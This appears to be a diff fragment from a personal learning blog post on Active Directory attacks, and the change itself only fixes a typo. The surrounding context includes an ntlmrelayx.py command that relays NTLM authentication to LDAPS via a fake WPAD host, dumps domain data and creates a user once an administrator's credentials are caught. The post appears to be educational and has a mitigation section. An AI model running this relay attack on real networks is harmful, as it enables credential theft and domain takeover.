barabulkit/barabulkit.github.io/_posts/learning/2023-10-20-ad-attacks-part2.md

 ntlmrelayx.py -6 -t ldaps://192.168.1.100 -wh fakewpad.arasaka.local -l lootme
 ```

-This will gaher info about domain users and computers and store it on lottme folder, also will create user when it catches administator user logged into computer
+This will gather info about domain users and computers and store it on lottme folder, also will create user when it catches administator user logged into computer

 ### Mitigation